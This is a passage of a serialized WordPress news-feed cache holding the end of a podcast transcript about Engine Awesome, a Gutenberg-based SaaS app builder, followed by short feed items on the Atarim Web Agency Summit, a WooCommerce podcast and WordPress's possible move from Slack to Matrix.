piece of technology at the time, in that you could put data in, it was basically a spreadsheet, but then it could show you that data, back at you in a variety of different ways.</p>\n\n\n\n<p>So that leads me to the question, is that possible here? It sounds like the answer&#8217;s yes. So, as an example, let&#8217;s say that I&#8217;m a real estate agent and I&#8217;m updating data about houses on my roster. And I&#8217;ve input all the fields. I&#8217;ve got images. I&#8217;ve got prices and descriptions and maps of floor plans, all of that kind of thing.</p>\n\n\n\n<p>Is it possible for me to create bespoke layouts of that data? So rather than it just being an Airtable, which looks like, well, a spreadsheet, you&#8217;ve got other options in there, but basically a spreadsheet. Is it possible for me to, I don&#8217;t know, float images right? Or highlight this particular aspect of the text? Make this a heading and you know, add iconography.</p>\n\n\n\n<p>In other words can I make the data engaging to look at? And further to that, can I bind those presentation layers to members of my team? So for example, could the sales director see a different layout of different data and somebody who&#8217;s in marketing, front of shop, might be able to show data to a customer that walks in the store? That kind of thing.</p>\n\n\n\n<p>[00:33:23] Steve Bruner: Yeah, so it&#8217;s interesting you brought up Airtable, right? Because Airtable is a no-code solution that, like you said, is mostly a spreadsheet. And I want to get back to that because I think Tim and I, we feel a little differently than the way Airtable and some other no-code solutions do their business.</p>\n\n\n\n<p>But to answer your question, yes. You can build really compelling, beautiful layouts using Engine Awesome. Because you&#8217;re using the Gutenberg design tools, right ? So you&#8217;re essentially designing a webpage, but it&#8217;s a, you know, maybe it&#8217;s a form or tables or some type of layout. But yes, you can float things, right? You can float through things left. You can bold, change colors. We have themes. We brought in themes as well. So with one click you can change the color and style of your application.</p>\n\n\n\n<p>In terms of different team members using Engine Awesome and seeing different things and seeing different items. This is a really important point, right. Tim and I are actually going through this right now. How we want the user roles and capability system to work i Engine Awesome. Because our goal, and this is the goal we&#8217;ve had since day one. I think this is also what makes us different from a lot of no-code solutions out there, is that we want your entire team using Engine Awesome.</p>\n\n\n\n<p>We don&#8217;t charge per user, and I think that&#8217;s a really important point, right? We really are charging per organization or per team. We want everybody, we want your part-timers to use Engine Awesome. You want the CEO to use Engine Awesome. Everybody in between. You shouldn&#8217;t have to pick and choose who needs to use an application. We really believe at our core that when your entire team is on the same page and uses the same application, and can see the same data, your life&#8217;s going to be better. Your business will be better. Everybody will be more productive.</p>\n\n\n\n<p>So we&#8217;re working really hard to make sure we have this roles and capabilities system that allows to do exactly what you&#8217;re talking about, and really fine tune it. So that everyone is on the same page.</p>\n\n\n\n<p>[00:35:28] Nathan Wrigley: Timothy, anything to add to that?</p>\n\n\n\n<p>[00:35:30] Timothy Jacobs: Yeah, I would mention one thing, which is that right now we have things set up so that you can have different levels of permission. So you can have and invite users onto your team that can just read data, for instance, or who can just edit data, but they can&#8217;t make changes to your application. But yeah, the next big thing is figuring out what it looks like and how do you make it intuitive for users to set up an application where they consider different things like permissions and capabilities?</p>\n\n\n\n<p>There are some tools that, the kind of permission system is really just visibility. And if you&#8217;re a developer, you can sneak under the hood and they throw warnings all over the documentation that, hey, you know, even though you&#8217;re, you think you&#8217;re hiding this data, you&#8217;re not actually hiding this data. Because it still gets sent to every user&#8217;s browser or something like that.</p>\n\n\n\n<p>So thinking through ways to make it very intuitive for users to say, hey, how do we actually set up our permission model, is the thing we&#8217;re exploring.</p>\n\n\n\n<p>[00:36:28] Nathan Wrigley: Will it be possible to change the data on, for want of a better word, the front end? In other words, if you&#8217;ve input the data in one UI, but then you&#8217;re looking at the way it&#8217;s presented, the theme, if you like. Is it possible for, and again, user permissions, we&#8217;ll assume that that&#8217;s coming down the pike, but is it possible to have people change the data in the different displays? Or do you have to always return to the, if you like, WordPress post to amend that data?</p>\n\n\n\n<p>[00:36:55] Timothy Jacobs: Yeah, so you can edit the data everywhere. This is a trend that we&#8217;ve been seeing with a lot of these different tools. Is that they give you different layouts that can present your data, but at the core of it, they all have a data mode where you&#8217;re basically looking at a spreadsheet or a very, I&#8217;ll say charitably, a plainly designed form that doesn&#8217;t have a sense of hierarchy or related bits of information. And then you can present it in any way that you would want.</p>\n\n\n\n<p>For us though, the first thing that we wanted to tackle was to make sure that when you presented and created a beautiful layout, that your users could also edit the data in that layout. So right now we don&#8217;t have, for instance, a separate kind of raw spreadsheet like view into your data. That&#8217;s something that is on our roadmap. But our main actual priority is for users to be entering in data through the rich UIs that you create.</p>\n\n\n\n<p>[00:37:48] Nathan Wrigley: I feel that&#8217;s one of the, one of the great advances recently. The ability to change it wherever you are. I think that would be really good. Because it is frustrating if, well, you&#8217;re looking at the data that you want to amend and then you have to, in WordPress parlance, click edit post and then go and find that field and amend that field and then click save and then go back and make sure it looks how it ought to look. That&#8217;s just one of the best things about this whole approach, isn&#8217;t it? Is that you can do it right there on the front end.</p>\n\n\n\n<p>Just moving slightly. Obviously you&#8217;re a SaaS app. You&#8217;re consuming all sorts of data. Probably you can imagine where this question&#8217;s going. If you are consuming, I don&#8217;t know, email addresses, images, all sorts of financial information, whatever it may be. How are you storing that? Where is that data being kept? If I&#8217;m in the EU, do you have it in a certain jurisdiction? Is it encrypted? Let&#8217;s just leave it at that.</p>\n\n\n\n<p>[00:38:41] Timothy Jacobs: Yeah, that&#8217;s a great question. So right now we don&#8217;t have a separate EU instance for instance. Unintentional rhyming there. But the way that we&#8217;ve set this up is, we are using MongoDB as our database system. And each team that gets created gets their own, essentially database inside of MongoDB to themselves.</p>\n\n\n\n<p>So right now that&#8217;s all centrally part of Digital Ocean&#8217;s managed database service and their encryption at rest and so on and so forth. And there are a lot of great security practices. In the future though, what that means is that we&#8217;ll be able to support teams having data that is in a different data center, depending on what their needs are.</p>\n\n\n\n<p>And even for potentially more enterprise customers, the need to be able to self-host their own database. Engine Awesome is set up to be able to connect to different database applications. But right now all of that data is stored in Engine Awesome, in Digital Ocean.</p>\n\n\n\n<p>[00:39:37] Nathan Wrigley: Okay, thank you. You mentioned enterprise there, but also Steve earlier was talking about examples of local charities and things like that. So is this software basically open to everybody? And on the website, forgive me, it may be that I&#8217;m just not looking all that carefully, but I can&#8217;t see a price. So I don&#8217;t know if that&#8217;s a function of you haven&#8217;t worked out your pricing yet. Or if it&#8217;s a contact us, and we&#8217;ll talk through what it is that we think you&#8217;re going to need, and we&#8217;ll work out the pricing accordingly. But are you aiming at all the people all the time. Enterprise, just small mom and pop stores. How are you launching and what is the pricing model?</p>\n\n\n\n<p>[00:40:14] Steve Bruner: So right now most of our clients are small to medium size businesses. We&#8217;re not writing off enterprise, we just realize that enterprise may need other features that we don&#8217;t have yet. Like single sign-on or maybe a, you know, a dedicated SLA or something of that nature.</p>\n\n\n\n<p>So we&#8217;re not there yet. Obviously we&#8217;re happy to talk to enterprise. There is one larger company that expressed an interest in Engine Awesome, and we&#8217;ve been talking to them. But right now, all of our clients have been small to medium sized businesses.</p>\n\n\n\n<p>The pricing model we&#8217;re still playing with. Again, we don&#8217;t want to charge per user. So we&#8217;ve been playing with all sorts of ideas. The number of records you use. Or the resources you use. Our goal is to get you and your entire team on Engine Awesome, and we&#8217;re willing to do whatever it takes to get you there.</p>\n\n\n\n<p>So, right now we have a manual onboarding process. If you sign up for Engine Awesome, you&#8217;re scheduling a Zoom call with me. So we have a talk. I find out what your needs are, how you plan on using Engine Awesome, your pain points. And we talk it through.</p>\n\n\n\n<p>And at that point we start working out where Engine Awesome fits into your plan. For smaller teams, we&#8217;re in the $10 range a month, $15 range a month, $20 a month. But we&#8217;re not really going much higher than that right now.</p>\n\n\n\n<p>[00:41:42] Nathan Wrigley: Are you going to be making use? So we&#8217;re in phase three of Gutenberg, which is for want of a better word, concurrent editing. Think Google Docs. Are you going to be making use of that? I mean, I can see that being incredibly useful if it&#8217;s pulled off. But is that something that you are thinking about implementing?</p>\n\n\n\n<p>[00:42:00] Timothy Jacobs: I would love to. It&#8217;s something that I&#8217;m seeing, and I&#8217;m really, really excited to see how that evolves. I&#8217;m really curious how the core Gutenberg team is going to approach designing that. I think there&#8217;s a lot of UX patterns that are going to be challenging. And seeing them pull that off is going to be really interest.</p>\n\n\n\n<p>And then seeing how that connects to WordPress. Is it going to be like peer to peer? Is it going to go through WordPress, as the PHP backend? What is all that going to look like from a technical perspective I think will also be fascinating. For us, I think one of the benefits of being a SaaS application is that it makes it a little bit easier for us to do that kind of orchestration, because we control what the backend is.</p>\n\n\n\n<p>But of course with WordPress, when we&#8217;re building for WordPress, we&#8217;re building for like 45% of the web. So the technical requirements are a lot more of a challenge. Yeah, I&#8217;m keeping a keen eye on that and I&#8217;m really excited to see how that progresses. Because, yeah, I think that&#8217;ll take Gutenberg to high Peaks, and will be something that a lot of different people building on top of the block editor, on top of the Gutenberg project will be able to utilize.</p>\n\n\n\n<p>[00:43:07] Nathan Wrigley: That was kind of like a roadmap question, but in disguise. Let&#8217;s just ask it outright. Just outline for us in the near future, we&#8217;re recording this towards the middle of February, so depending on how long it takes this podcast episode to actually make it out into the public, some of these things may have come a along already. But just outline roughly, maybe let&#8217;s go for six months, eight months, something like that. What&#8217;s the plan? What are you hoping to implement?</p>\n\n\n\n<p>[00:43:32] Steve Bruner: Well, our customers are always giving us ideas, right? So things do change like you mentioned. Our priority of right now is user roles and capabilities. Once that&#8217;s integrated, and that&#8217;s going to take a little bit because not only do we need to plan it out and how it&#8217;s going to work technically. We also need to make it super simple to implement, so clients can do this and feel comfortable that the right people are seeing the right data. So that is going to take a little bit of time.</p>\n\n\n\n<p>E-commerce would probably be our next big focus. Our clients want to start taking payments from their clients, right? The cleaning service is a great example. Right now the plan for her is to email a Stripe payment link to her clients, but we want to make things a little bit easier.</p>\n\n\n\n<p>Also that feature would, currently being done through Zapier. Which is an additional charge. So we want to bring that into Engine Awesome, where we can make it seamless and where our clients won&#8217;t have to pay any more for that.</p>\n\n\n\n<p>Those are probably the two major features that we want to roll out in the next six months. There are other things we want to do. We want to do, you know, we want to add scheduling. Again, a lot of our clients are service businesses. So scheduling is a big part of that, and they&#8217;re using services like Calendly, and if we can do something better or bring it into Engine Awesome , make it easier for them to use, then we want to be able to do that as well.</p>\n\n\n\n<p>[00:44:55] Nathan Wrigley: The introductions at the top of the show made it pretty obvious that you&#8217;ve got a history of giving back to WordPress. So, forgive me if this question sounds ill placed. But given that you are leveraging quite a lot of the Gutenberg project to build out your SaaS app, I&#8217;m just wondering what your posture is in terms of giving back from Engine Awesome. Back to Gutenberg. Again caveat emptor. Sorry, I know that you both do more than enough already, but I just wondered if that was part of the ethics of the business.</p>\n\n\n\n<p>[00:45:28] Timothy Jacobs: Yeah, I&#8217;m a big believer in that I think the Gutenberg project gets better the more different use cases that we have. Historically, my contributions to WordPress have been mainly focused on the REST API, and how Gutenberg interacts with the REST API. But I hope to be able to dive in more and more into the core Gutenberg project.</p>\n\n\n\n<p>So I think being good stewards of the open source community is a key aspect to building on top of an open source project. Both from, this is the best thing to do from a kind of community standpoint. But I think also everyone should really be thinking about how they contribute back to Gutenberg. So that we have a say in shaping how Gutenberg moves forward.</p>\n\n\n\n<p>There&#8217;s a lot of work to do, and we all have different pet features or things that we might want to have changed or improved in Gutenberg. And, really the long and short of it is that there&#8217;s more work to do than there are contributors to do the work. So the more of us that can contribute back to the Gutenberg project and the WordPress Core project, the faster we&#8217;re all able to go.</p>\n\n\n\n<p>[00:46:39] Nathan Wrigley: Thank you, Steve. Anything there?</p>\n\n\n\n<p>[00:46:42] Steve Bruner: No, Tim said it all. Tim said it best. He&#8217;s been a core contributor for a long time. Our goal from day one, like you mentioned, we&#8217;ve been contributing to the WordPress community in both code and education for a very long time and we want to continue to do that.</p>\n\n\n\n<p>[00:46:57] Nathan Wrigley: Yeah, that&#8217;s a nice answer to hear actually. That&#8217;s very heartening. Thank you. Should anybody have been listening to this podcast, had their interest peaked. They&#8217;re either interested in talking about what you did with Gutenberg from a technological point of view, because maybe they&#8217;re thinking of adopting Gutenberg in their own platform. Or they just want to actually find out what they can do with Engine Awesome themselves.</p>\n\n\n\n<p>I don&#8217;t know if you want to answer this question separately or combined, but where is the best place to get in touch? Is it a contact form? An email address? Is it, dare I say it, Twitter.</p>\n\n\n\n<p>[00:47:30] Steve Bruner: Right now our website is really the best place to contact us. So engineawesome.com. On the homepage if you are interested in signing up, or just getting on a Zoom call with me to learn more, there&#8217;s a input right there where you can put in your email address and sign up for that.</p>\n\n\n\n<p>And we also have a contact form where if you have questions about Gutenberg and how we did this and you want a more heavy developer talk, you want to chat with Tim, then that&#8217;s the place to let us know.</p>\n\n\n\n<p>[00:47:59] Timothy Jacobs: Yeah, you can also always find me on the make make dot WordPress Slack. That&#8217;s also a great place to reach out.</p>\n\n\n\n<p>[00:48:05] Nathan Wrigley: Okay. Thank you Timothy Jacobs and Steve Bruner. Thanks for joining me on the podcast today to talk about Engine Awesome. I really appreciate it.</p>\n\n\n\n<p>[00:48:13] Steve Bruner: Thank you, Nathan. I really, I really enjoyed this.</p>\n\n\n\n<p>[00:48:15] Timothy Jacobs: Thanks for having us.</p>\n</div>\n\n\n\n<p>On the podcast today we have <a href=\"https://wordpress.org/support/users/sbruner/\">Steve Bruner</a> and <a href=\"https://profiles.wordpress.org/timothyblynjacobs/\">Timothy Jacobs</a>.</p>\n\n\n\n<p>Steve has been active in the WordPress community for the past 17 years. He&#8217;s a WordPress developer, co-organizer of the <a href=\"https://www.meetup.com/WordPressNYC/\">WordPressNYC Meetup</a>, and has organised many WordCamps in New York City.</p>\n\n\n\n<p>Timothy is a WordPress Core Committer for the REST API, and has been a WordPress developer for over ten years. At <a href=\"https://stellarwp.com/\">StellarWP</a>, he leads development of the iThemes Security plugin.</p>\n\n\n\n<p>What brings them together is that they’re both founders of a SaaS app called <a href=\"https://engineawesome.com/\">Engine Awesome</a>, where Steve is the CEO and Timothy is the CTO.</p>\n\n\n\n<p>What has this got to do with WordPress, you might ask. Well, they’re here today to talk about Gutenberg, but not how you might expect. It’s Gutenberg outside of WordPress, but Gutenberg nonetheless.</p>\n\n\n\n<p>Like all of WordPress, Gutenberg is open source. You are free to download it, modify it, and use it in whatever way you like. When Steve and Timothy began working on their new project, and needed a way for their clients to interact with it, they found Gutenberg was the perfect tool for the job.</p>\n\n\n\n<p>We talk about what benefits they’ve gained by using Gutenberg. How it’s saved them time, and how it’s fast becoming a stable and mature product, which is easy for non-technical users to understand.</p>\n\n\n\n<p>We get into the details of which parts of Gutenberg they used, and which parts were not suitable for their app. They’ve been building their own blocks which work well in the UI, but which are more suited to the kinds of data that they’re gathering.</p>\n\n\n\n<p>The discussion then moves onto what Awesome Engine actually does. It’s an app builder in which you can construct your own data containers and theme them so that it displays in any way you like. They tell us about the features which they have so far, as well as the items which are on their roadmap.</p>\n\n\n\n<p>Towards the end, we talk about their commitment to continue contributing back to the Gutenberg project, and how they feel that it’s in everyone’s interest if the project gets better from any updates that they have made.</p>\n\n\n\n<p>If you’re looking to build your own SaaS app, or you’re just curious about how Gutenberg is being deployed outside of WordPress, this podcast is for you.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Useful links.</h2>\n\n\n\n<p><a href=\"https://github.com/VanOns/laraberg/\">Laraberg</a></p>\n\n\n\n<p><a href=\"https://www.drupal.org/project/gutenberg\">Gutenberg for Drupal</a></p>\n\n\n\n<p><a href=\"https://engineawesome.com/2023/01/23/engine-awesome-has-a-new-look/\">Engine Awesome has a new look!</a> &#8211; blog post</p>\n\n\n\n<p><a href=\"https://airtable.com/\">Airtable</a></p>\n\n\n\n<p><a href=\"https://www.mongodb.com/\">MongoDB</a></p>\n\n\n\n<p><a href=\"https://www.digitalocean.com/products/managed-databases\">Digital Ocean&#8217;s managed database service</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 19 Apr 2023 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Nathan Wrigley\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: Atarim to Host 4th Annual Virtual Web Agency Summit April 25-28\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143723\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"https://wptavern.com/atarim-to-host-4th-annual-virtual-web-agency-summit-april-25-28\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3112:\"<p>Atarim is hosting its 4th annual <a href=\"https://atarim.io/summit/\">Web Agency Summit</a> from April 25-28. The virtual event is geared towards web agencies and WordPress professionals, with topics focused on web trends, scaling an agency or freelance business, attracting high-paying clients, and building recurring revenue.</p>\n\n\n\n<p>Web Agency Summit was born out of the organizers&#8217; frustration with the first WordCamp Asia getting canceled at the beginning of the pandemic.</p>\n\n\n\n<p>&#8220;When WordCamp Asia was first canceled, I had a lot of thoughts, of course,&#8221; ScaleMath founder Alex Panagis said. &#8220;Something that we were somewhat really hoping would help us make a big splash in the industry was pulled away from right under us. </p>\n\n\n\n<p>&#8220;But, instead of letting this setback get to us – we decided we had to do something. We decided to step up and host what was then the first (and went on to be the biggest) virtual summit in our industry. Sponsors like GoDaddy, WordPress.org, and many more were quite quick to step in, to the point where we were overwhelmed by the support we received and how well-received the entire summit concept was.&#8221;</p>\n\n\n\n<p>This year&#8217;s lineup includes representatives from Microsoft, Google, Yoast, Hubspot, XWP, Elementor, and more, including 40+ WordPress experts. Web Agency Summit includes individual speaker sessions, such as &#8220;<em>Headless WordPress &#8211; does this approach make sense?&#8221;</em> and <em>&#8220;The Role of AI in Content &amp; SEO</em>.&#8221;  Attendees will have the opportunity to join sessions on boosting client acquisition on LinkedIn, growing a freelancing business, productizing designs, launching a podcast, managing contractor teams, and more.</p>\n\n\n\n<p>This year&#8217;s event will also feature seven expert-led panels: </p>\n\n\n\n<ul>\n<li><strong>Changing Tides:</strong> How Industry Acquisitions &amp; Investments are Shaping the Future of WordPress, and What It Means For Your Agency</li>\n\n\n\n<li><strong>From Connections to Clients:</strong> Building Communities for Web Design Agency Growth</li>\n\n\n\n<li><strong>From CMS to Digital Powerhouse:</strong> The Expansive Power of WordPress and How It Can Reshape the Tech Landscape</li>\n\n\n\n<li><strong>Building The Future:</strong> Exploring the Power of Next Generation Website &amp; Page Builders</li>\n\n\n\n<li><strong>Cracking The Code:</strong> How to Choose the Best Web Hosting for Your Business</li>\n\n\n\n<li><strong>Embracing AI in Web Design:</strong> Unlocking Profitability for Agencies &amp; Freelancer</li>\n\n\n\n<li><strong>Beyond Viral Videos:</strong> Maximizing YouTube for Agency Growth &amp; What Comes Next</li>\n</ul>\n\n\n\n<p> Attendees will be able to meet sponsors in a virtual festival village to win prizes, and join breakout rooms to network and make new industry connections.</p>\n\n\n\n<p><a href=\"https://atarim.io/summit/\">Registration</a> for the Web Agency Summit is free but seats are limited. Every presentation will be recorded and will be available to watch for free live and for 24 hours following the event.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Apr 2023 22:12:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"Do The Woo Community: A Journey to Improve the WooCommerce Onboarding with Vikas Singhal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://dothewoo.io/?p=74796\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"https://dothewoo.io/a-journey-to-improve-the-woocommerce-onboarding/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:403:\"<p>Vikas joins Jonathan to chat about his WordPress journey and how it led to building InstaWP.</p>\n<p>&gt;&gt; The post <a rel=\"nofollow\" href=\"https://dothewoo.io/a-journey-to-improve-the-woocommerce-onboarding/\">A Journey to Improve the WooCommerce Onboarding with Vikas Singhal</a> appeared first on <a rel=\"nofollow\" href=\"https://dothewoo.io\">Do the Woo - a WooCommerce Builder Community</a>	.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Apr 2023 11:28:34 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"BobWP\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:3;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:113:\"WPTavern: WordPress Contributors Continue Exploring Migration of Public and Private Messages from Slack to Matrix\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=143725\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:124:\"https://wptavern.com/wordpress-contributors-continue-exploring-migration-of-public-and-private-messages-from-slack-to-matrix\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4979:\"<p>In early 2023, WordPress and Matrix contributors proposed a new Meta team subproject to <a href=\"https://wptavern.com/wordpress-project-to-evaluate-replacing-slack-with-matrix-open-source-chat\">explore replacing Slack communication with Matrix</a>, an open source federated chat system. After the team&#8217;s most recent meeting, Automattic-sponsored contributor Alex Kirk <a href=\"https://make.wordpress.org/meta/2023/04/06/matrix-chat-summary-april-6-2023/\">published</a> an update on the status of recent experiments in migration.</p>\n\n\n\n<p>After researching more on migrating public messages, Kirk said the team is now evaluating whether the Apache-2.0 licensed <a rel=\"noreferrer noopener\" href=\"https://github.com/Awesome-Technologies/slack-matrix-migration\" target=\"_blank\">Slack Matrix migration tool</a> could work for this project.</p>\n\n\n\n<p>&#8220;It operates on Slack export files and requires a fresh Synapse server,&#8221; Kirk said.</p>\n\n\n\n<p>&#8220;We haven’t yet been able to confirm whether it actually can import the messages and hope to be able to share more on the next meeting.&#8221;</p>\n\n\n\n<p>On the subject of migrating private messages, Kirk said the team is leaning towards ensuring users have the tools to save their own external archives.</p>\n\n\n\n<p>&#8220;For migrating private messages in DMs or private groups we’ve concluded that we won’t want to attempt their migration but will look into providing tools for achieving that,&#8221; Kirk said.</p>\n\n\n\n<p>&#8220;Here we’ve found that <a rel=\"noreferrer noopener\" href=\"https://addons.mozilla.org/en-GB/firefox/addon/slack-channel-exporter/\" target=\"_blank\">browser</a> <a rel=\"noreferrer noopener\" href=\"https://chrome.google.com/webstore/detail/robsi-slack-channel-expor/henmphndbgifealbmebncbdfgkilagbe\" target=\"_blank\">extensions</a> exist which allow you to download your own Slack direct messages inside your browser as a text file. Possibly it’ll be our recommendation to use those tools to export the messages for yourself.&#8221;</p>\n\n\n\n<p>Kirk also addressed some accessibility concerns that WordPress Accessibility Team contributor Alex Stine raised during a <a href=\"https://make.wordpress.org/meta/2023/03/27/matrix-chat-summary-march-23-2023/\">meeting</a> at the end of March: </p>\n\n\n\n<blockquote class=\"wp-block-quote\">\n<p>Slack is well supported and accessible to a very wide audience. Something that is not up for argument, a lot of these open-source/decentralized concepts are not accessible to all or most.</p>\n\n\n\n<p>The decentralized media world walks a fine line between a great thing and a lot of hypocrisy. On one hand, claiming to give users a voice, on the other hand, knowingly excluding users of assistive tech.</p>\n\n\n\n<p>Years of&nbsp;GitHub&nbsp;issues do not lie. Matrix has not been around all that long but there are plenty of other examples that have been around long enough…The Slack accessibility team is best in its class. They are constantly responsive and very engaged with users.</p>\n</blockquote>\n\n\n\n<p>Kirk linked to an article published by Mozilla accessibility engineer Marco Zehe titled <a href=\"https://www.marcozehe.de/how-to-use-element-and-matrix-with-a-screen-reader/\">How to use Element and Matrix with a screen reader</a>. Mozilla replaced IRC with Matrix in 2020, identifying Matrix as an &#8220;excellent <em>open community collaboration</em> tool, with robust support for accessibility and community safety.&#8221;</p>\n\n\n\n<p>Zehe&#8217;s post is essentially a guide to help those using assistive technology find their way around Element and the Matrix Eco system more easily. It also highlights a few things that do not yet work well, including keyboard navigation for the members list and messages.</p>\n\n\n\n<p>&#8220;I hope some of these issues are no longer problems,&#8221; Stine said in response to Kirk sharing the article. &#8220;If they still are, this would be no doubt a far worse experience than Slack was in some of its worst times. The fact that users have to switch their screen reader modes just to have basic functionality support is not cool. Here is the way I see it. If modern apps do not follow a similar pattern for your OS to the point where you have to look up docs to figure out how to use it, it is probably too complicated and/or not accessible by my definition.&#8221;</p>\n\n\n\n<p>The question of whether it would be beneficial for the WordPress project to <a href=\"https://make.wordpress.org/meta/2023/01/25/a-meta-subproject-for-evaluating-matrix/\">replace Slack communication with Matrix</a> is still yet unanswered, but the initial response to the idea was overwhelmingly positive. More research into the logistics of migration will be a necessary part of the decision.</p>\n\n\n\n<p>The Matrix contributors proposing this new exploration will meet again on Wednesday, April 19, for the regularly scheduled bi-weekly meeting and plan to discuss the research on migrating messages from Slack.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 18 Apr 2023 03:51:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:4;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:129:\"Gutenberg Times: All Women-release squad for 6.4 , Grid Layout , Pattern for front-page designs and more – Weekend edition 